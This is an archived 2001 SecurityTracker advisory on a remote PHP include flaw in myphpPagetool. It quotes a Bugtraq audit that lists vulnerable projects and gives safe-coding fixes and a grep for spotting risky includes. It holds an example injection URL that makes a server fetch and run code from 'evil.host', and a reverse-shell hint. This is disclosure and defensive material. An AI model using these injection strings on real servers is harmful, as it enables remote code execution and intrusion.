SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   myphpPagetool Vendors:   [Multiple Authors/Vendors]
myphpPagetool Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1002496
SecurityTracker URL:  http://securitytracker.com/id/1002496
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 7 2001
Impact:   Execution of arbitrary code via network, User access via network


Description:   A vulnerability was reported in myphpPagetool, a PHP-based web portal and management system. Remote users can supply arbitary code that will be executed by the web server.

The flaw can be triggered by a remote user that supplies a malicious include directory for a PHP function that does not otherwise specify the include directory. When the PHP function is executed, it will load user-supplied code from the remote malicious include directory. The code will be executed with the privileges of the web server.

The specific vulnerable function(s) was not identified in the report.

Impact:   A remote user can execute arbitrary code on the server with the privileges of the web server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  myphppagetool.sourceforge.net/ (Links to External Site)
Cause:   State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  results of semi-automatic source code audit


/*
 * results of semi-automatic source code audit of a
 * majority of php based open-source projects registered
 * at Freshmeat.net or Sourceforge.net
 *
 * release date: 2001-10-02
 *
 * authors:
 *    atil                <bugtraq@jakob.weite-welt.com>
 *    genetics                      <veenstra@chello.nl>
 *    #yaht@ircnet, Yet Another Hacker Team
 */

--=[introduction]=--
php comes shipped with two features enabled by default that make
unsuspicious looking source execute arbitrary code:
- variables passed from the browser are stored in global context
- file-system functions work transparent on URLs

--=[background]=--
This exploits for php are not new and it's not the fault of php or any
bug in the source of php itself but of the authors of a large number
of projects written in php. What is new is the extensive audit of a
huge amount of projects and the surprisingly large number of
vulnerabilities discovered.

--=[our task]=--
We looked for files often not directly accessed by the browser but
included from somewhere else that contained something like this:

in helperfunction.php :
  include("$includedir/library.php");

If the variable $includedir is not set by something executed before
the include-statement, we can override it from the http-client with
something like this:

http://vuln.host/helperfunction.php?includedir=http://evil.host/code

When the script is executed on vuln.host the php-interpreter will
fetch the document http://evil.host/code/library.php and execute
it. Breaking into the system is easy now because you can pass any
php-source to the vulnerable system (download binaries, execute code,
start reverse-shells (e.g. "xterm -display evil.host:1")...) that
will be executed by the user running the web-server (mod_php) or by
the owner of the virtual-host (CGI-interpreter). 

--=[solution]=--
php is not insecure by default, but makes insecure programming very
easy. Here are some solutions to write safe php-code:

- give included php-files a filename that is not executed by the
  web-server

- put all included php-code outside the docroot (not possible for
  all users), use file permissions or .htaccess

- use constants (best approach)

  in main.php:
    define("MAINFILE", true);
    define("CONFIGDIR", "/some/path/");
    include('./some_function.inc');

  in some_function.inc:
    if ( !defined("MAINFILE") ) die ("this is a include file!");
    include(CONFIGDIR . "config.inc");

  If you set global variables from the client, they don't
  interfere with constants; the defined-Test is not necessary for
  security.

- use $HTTP_*_VARS and disable global variables from the client

--=[scope]=--

Our audit searched only for vulnerabilities with include-files and can
never be compared to a detailed analysis of a complete project. If
your php-project didn't show up on the list below doesn't mean that
you can relax now. We want to make people working on all this great
php projects to become sensitive to the fact, that using modern
scripting languages doesn't make your code safe by default.

--=[hint for ISPs]=--
If you are an ISP and want to identify possible exploitable php code
on your web-server use this:

find -type f -a -name '*.php*' -print0 |
xargs -0 grep -l -E '(include|require)(_once)? *\( *"?\$'

The resulting files need further manual inspection...

--=[vulnerable projects]=--
(all maintainers have been informed a while ago)

Actionpoll    http://sourceforge.net/projects/actionpoll
AWOL          http://www.freshmeat.net/projects/awol
CCC           http://www.cccsoftware.org
DarkPortal    http://sourceforge.net/projects/darkportal
Empris        http://empris.sourceforge.net
Moregroupware http://www.moregroupware.org
Phorecast     http://phorecast.org
Phormation    http://www.peaceworks.ca/phormation.php
pSlash        http://www.pslash.com
The Gallery   http://sourceforge.net/projects/gallery
webodex       http://homepage.mac.com/ghorwood/webodex
Zorbstats     http://freshmeat.net/projects/zorbstats
phpAdsNew     http://sourceforge.net/projects/phpadsnew
myphppagetool http://myphppagetool.sourceforge.net
ActionPoll    http://sourceforge.net/projects/actionpoll
SIPS          http://sips.sourceforge.net
thatware      http://thatware.org

We don't provide the exact vulnerable pice of code but we secured our
results with at least one machine (mostly the demo-site of the project)
where we could execute a phpinfo()-script comming from our webserver.

cheers

atil & genetics

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC